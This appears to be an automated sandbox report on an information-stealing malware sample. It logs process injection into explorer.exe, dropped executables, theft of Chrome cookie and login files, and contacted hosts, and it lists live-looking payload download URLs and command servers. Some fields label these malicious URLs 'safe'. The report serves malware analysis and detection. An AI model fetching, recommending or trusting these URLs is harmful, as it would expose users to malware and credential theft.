                  Source: C:\Users\user\Desktop\file.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,
                  Source: C:\Users\user\AppData\Roaming\tfgatraCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
                  Source: C:\Users\user\AppData\Roaming\tfgatraCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,
                  Source: C:\Users\user\AppData\Roaming\tfgatraCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                  Source: C:\Users\user\AppData\Roaming\tfgatraCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,
                  Source: C:\Users\user\AppData\Roaming\tfgatraCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,
                  Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.3.file.exe.730000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.tfgatra.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.tfgatra.5a0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.600e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000000.389821626.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.519638464.0000000000781000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.405651754.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.516365720.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.406487208.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.305829321.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: Process Memory Space: 2A57.exe PID: 4476, type: MEMORYSTR
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.3.file.exe.730000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.tfgatra.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.tfgatra.5a0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.600e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000000.389821626.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.519638464.0000000000781000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.405651754.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.516365720.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.406487208.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.305829321.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 2A57.exe PID: 4476, type: MEMORYSTR
                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts1
                  Exploitation for Client Execution
                  1
                  DLL Side-Loading
                  612
                  Process Injection
                  11
                  Masquerading
                  1
                  OS Credential Dumping
                  411
                  Security Software Discovery
                  Remote Services1
                  Input Capture
                  Exfiltration Over Other Network Medium11
                  Encrypted Channel
                  Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading
                  12
                  Virtualization/Sandbox Evasion
                  1
                  Input Capture
                  12
                  Virtualization/Sandbox Evasion
                  Remote Desktop Protocol1
                  Archive Collected Data
                  Exfiltration Over Bluetooth13
                  Ingress Tool Transfer
                  Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)612
                  Process Injection
                  Security Account Manager3
                  Process Discovery
                  SMB/Windows Admin Shares1
                  Data from Local System
                  Automated Exfiltration4
                  Non-Application Layer Protocol
                  Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                  Deobfuscate/Decode Files or Information
                  NTDS1
                  Application Window Discovery
                  Distributed Component Object ModelInput CaptureScheduled Transfer125
                  Application Layer Protocol
                  SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                  Hidden Files and Directories
                  LSA Secrets1
                  Remote System Discovery
                  SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common2
                  Obfuscated Files or Information
                  Cached Domain Credentials1
                  File and Directory Discovery
                  VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                  Software Packing
                  DCSync113
                  System Information Discovery
                  Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                  DLL Side-Loading
                  Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                  File Deletion
                  /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 722349 Sample: file.exe Startdate: 13/10/2022 Architecture: WINDOWS Score: 100 51 en.xml-post.xyz 2->51 53 keziheritier.com 2->53 55 9 other IPs or domains 2->55 73 Snort IDS alert for network traffic 2->73 75 Multi AV Scanner detection for domain / URL 2->75 77 Malicious sample detected (through community Yara rule) 2->77 81 10 other signatures 2->81 9 file.exe 2->9         started        12 tfgatra 2->12         started        14 udgatra 2->14         started        signatures3 79 Performs DNS queries to domains with low reputation 51->79 process4 signatures5 99 Detected unpacking (changes PE section rights) 9->99 101 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 9->101 103 Maps a DLL or memory area into another process 9->103 107 2 other signatures 9->107 16 explorer.exe 23 9->16 injected 105 Machine Learning detection for dropped file 12->105 process6 dnsIp7 45 rukangiralawchambers.org 198.23.58.153 STEADFASTUS United States 16->45 47 179.43.163.115, 49698, 80 PLI-ASCH Panama 16->47 49 9 other IPs or domains 16->49 37 C:\Users\user\AppData\Roaming\udgatra, PE32 16->37 dropped 39 C:\Users\user\AppData\Roaming\tfgatra, PE32 16->39 dropped 41 C:\Users\user\AppData\Local\Temp\F4FD.exe, PE32 16->41 dropped 43 11 other malicious files 16->43 dropped 65 System process connects to network (likely due to code injection or exploit) 16->65 67 Benign windows process drops PE files 16->67 69 Injects code into the Windows Explorer (explorer.exe) 16->69 71 3 other signatures 16->71 21 F4FD.exe 16->21         started        24 2A57.exe 16->24         started        27 EAA.exe 16->27         started        29 6 other processes 16->29 file8 signatures9 process10 dnsIp11 83 Detected unpacking (changes PE section rights) 21->83 85 Machine Learning detection for dropped file 21->85 87 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 21->87 97 3 other signatures 21->97 57 star-mini.c10r.facebook.com 157.240.17.35 FACEBOOKUS United States 24->57 59 www.facebook.com 24->59 89 Antivirus detection for dropped file 24->89 91 Tries to detect virtualization through RDTSC time measurements 24->91 61 157.240.20.35 FACEBOOKUS United States 27->61 63 www.facebook.com 27->63 93 Tries to harvest and steal browser information (history, passwords, etc) 29->93 95 Injects a PE file into a foreign processes 29->95 31 WerFault.exe 7 29->31         started        33 WerFault.exe 3 29->33         started        35 ECFD.exe 29->35         started        signatures12 process13

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  file.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\EAA.exe100%AviraHEUR/AGEN.1210630
                  C:\Users\user\AppData\Local\Temp\2A57.exe100%AviraHEUR/AGEN.1210630
                  C:\Users\user\AppData\Local\Temp\ECFD.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\EAA.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\2A57.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\F4FD.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\udgatra100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\9763.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\EB37.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\B03C.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\tfgatra100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\543.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\857.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\3804.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLinkDownload
                  10.0.3804.exe.630e67.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  4.2.tfgatra.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  11.0.543.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  10.0.3804.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                  10.0.3804.exe.630e67.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  6.2.F4FD.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  11.3.543.exe.6d0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  10.0.3804.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  0.3.file.exe.730000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  10.0.3804.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                  10.3.3804.exe.640000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  11.0.543.exe.4e0e67.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  10.0.3804.exe.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                  6.3.F4FD.exe.600000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  4.2.tfgatra.5a0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  0.2.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  10.0.3804.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                  10.2.3804.exe.630e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  10.2.3804.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  6.2.F4FD.exe.5f0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  11.2.543.exe.4e0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  0.2.file.exe.600e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  9.2.ECFD.exe.400000.0.unpack100%AviraHEUR/AGEN.1223627Download File
                  11.2.543.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  11.0.543.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  10.0.3804.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  11.0.543.exe.4e0e67.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  SourceDetectionScannerLabelLink
                  kkh.eiwagggg.com6%VirustotalBrowse
                  en.eredirected.xyz21%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://avtlsgosecure.com/0%URL Reputationsafe
                  https://www.facebook.0%URL Reputationsafe
                  http://nuluitnulo.me/0%URL Reputationsafe
                  http://winnlinne.com/lancer/get.php0%URL Reputationsafe
                  http://bururutu44org.org/0%URL Reputationsafe
                  http://nvulukuluir.net/0%URL Reputationsafe
                  http://liubertiyyyul.net/0%URL Reputationsafe
                  http://furubujjul.net/0%URL Reputationsafe
                  http://youyouumenia5.org/0%URL Reputationsafe
                  http://guluiiiimnstra.net/0%URL Reputationsafe
                  https://www.rukangiralawchambers.org/22.exe0%URL Reputationsafe
                  http://furubujjul.net/Mozilla/5.00%URL Reputationsafe
                  http://179.43.163.115/intersock.exe0%URL Reputationsafe
                  http://aaa.apiaaaeg.com/check/?sid=203601&key=208a26f120e37e37bd82b4530154a948lE0%Avira URL Cloudsafe
                  http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
                  http://aaa.apiaaaeg.com:80/check/?sid=203601&key=208a26f120e37e37bd82b4530154a948bHU80%Avira URL Cloudsafe
                  http://aaa.apiaaaeg.com/check/safewQ0%Avira URL Cloudsafe
                  http://avtlsgosecure.c240%Avira URL Cloudsafe
                  http://aaa.apiaaaeg.com/0%Avira URL Cloudsafe
                  http://aaa.apiaaaeg.com/P0%Avira URL Cloudsafe
                  https://keziheritier.com/jamesp.exe0%Avira URL Cloudsafe
                  http://aaa.apiaaaeg.com/T0%Avira URL Cloudsafe
                  http://aaa.apiaaaeg.com/V0%Avira URL Cloudsafe
                  http://aaa.apiaaaeg.com/Q0%Avira URL Cloudsafe
                  https://keziheritier.com/7.exe0%Avira URL Cloudsafe
                  http://aaa.aptpokmmooootmtmymuok.com/w.facebohttps://wwcebfSTPOGET/device-based/logination/x-www-for0%Avira URL Cloudsafe
                  https://kkh.eiwagggg.com/files/pe/pb1113.exe0%Avira URL Cloudsafe
                  http://aaa.apiaaaeg.com/check/safeaaeg.comu0%Avira URL Cloudsafe
                  http://aaa.apiaaaeg.com/check/safe0%Avira URL Cloudsafe
                  http://aaa.apiaaaeg.com:80/check/safe0%Avira URL Cloudsafe
                  http://aaa.apiaaaeg.com/check/?sid=203601&key=208a26f120e37e37bd82b4530154a9480%Avira URL Cloudsafe
                  http://aaa.apiaaaeg.com/f0%Avira URL Cloudsafe
                  http://aaa.apiaaaeg.com/check/?sid=203601&key=208a26f120e37e37bd82b4530154a948SE0%Avira URL Cloudsafe
                  https://pelegisr.com/upload/ChromeSetup.exe0%Avira URL Cloudsafe
                  http://45.138.74.52/s.exe0%Avira URL Cloudsafe
                  http://aaa.apiaaaeg.com/check/safeeR0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  kkh.eiwagggg.com
                  172.67.144.83
                  truetrueunknown
                  star-mini.c10r.facebook.com
                  157.240.17.35
                  truefalse
                    high
                    en.eredirected.xyz
                    198.135.55.114
                    truetrueunknown
                    keziheritier.com
                    66.96.149.30
                    truetrue
                      unknown
                      jamesmillion.xyz
                      104.192.2.242
                      truetrue
                        unknown
                        libapi.tourl.pics
                        100.42.65.201
                        truefalse
                          unknown
                          github.com
                          140.82.121.3
                          truefalse
                            high
                            furubujjul.net
                            172.67.203.213
                            truetrue
                              unknown
                              pelegisr.com
                              185.220.204.62
                              truetrue
                                unknown
                                avtlsgosecure.com
                                176.124.192.220
                                truetrue
                                  unknown
                                  get.geojs.io
                                  104.26.0.100
                                  truefalse
                                    unknown
                                    rukangiralawchambers.org
                                    198.23.58.153
                                    truetrue
                                      unknown
                                      api.2ip.ua
                                      162.0.217.254
                                      truefalse
                                        high
                                        en.xml-post.xyz
                                        198.135.55.114
                                        truetrue
                                          unknown
                                          aaa.apiaaaeg.com
                                          45.136.151.102
                                          truefalse
                                            unknown
                                            www.facebook.com
                                            unknown
                                            unknownfalse
                                              high
                                              www.rukangiralawchambers.org
                                              unknown
                                              unknowntrue
                                                unknown
                                                NameMaliciousAntivirus DetectionReputation
                                                https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingfalse
                                                  high
                                                  http://avtlsgosecure.com/false
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://keziheritier.com/jamesp.exefalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://kkh.eiwagggg.com/files/pe/pb1113.exetrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://keziheritier.com/7.exefalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://nuluitnulo.me/true
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://winnlinne.com/lancer/get.phptrue
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://bururutu44org.org/true
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://nvulukuluir.net/true
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://liubertiyyyul.net/true
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://furubujjul.net/true
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://youyouumenia5.org/true
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://guluiiiimnstra.net/true
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://45.138.74.52/s.exetrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.facebook.com/ads/manager/account_settings/account_billingfalse
                                                    high
                                                    https://pelegisr.com/upload/ChromeSetup.exefalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.rukangiralawchambers.org/22.exefalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://179.43.163.115/intersock.exetrue
                                                    • URL Reputation: safe
                                                    unknown
                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/jQFlt4gyp9R.js?_nc_x=Ij3Wp8lg5Kz2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://static.xx.fbcdn.net/rsrc.php/v3/yh/l/02A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/V_wJ8EQu-vo.js?_nc_x=Ij3Wp8lg5Kz2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://static.xx.fbcdn.net/rsrc.php/v3/yr/l/02A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.565334783.0000000000809000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://messenger.com/2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://aaa.aptpokmmooootmtmymuok.com/w.facebohttps://wwcebfSTPOGET/device-based/logination/x-www-for2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yu/r/G76sQY80s37.js?_nc_x=Ij3Wp8lg5Kz2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://static.xx.fbcdn.net/rsrc.php/v3/yV/r/tuAGtaeF5Lw.js?_nc_x=Ij3Wp8lg5Kz2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/02A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://aaa.apiaaaeg.com/2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://aaa.apiaaaeg.com/check/?sid=203601&key=208a26f120e37e37bd82b4530154a948lE2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.openssl.org/support/faq.htmlECFD.exe, 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yK/l/en_US/7XFrsMZamvv.js?_nc_x=Ij3Wp8lg5Kz2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://static.xx.fbcdn.net/rsrc.php/v3/yH/l/02A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/ErrorECFD.exe, 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          low
                                                                          https://static.xx.fbcdn.net/rsrc.php/v3/yy/l/02A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yW/l/02A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.565334783.0000000000809000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://static.xx.fbcdn.net/rsrc.php/v3/y5/l/02A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
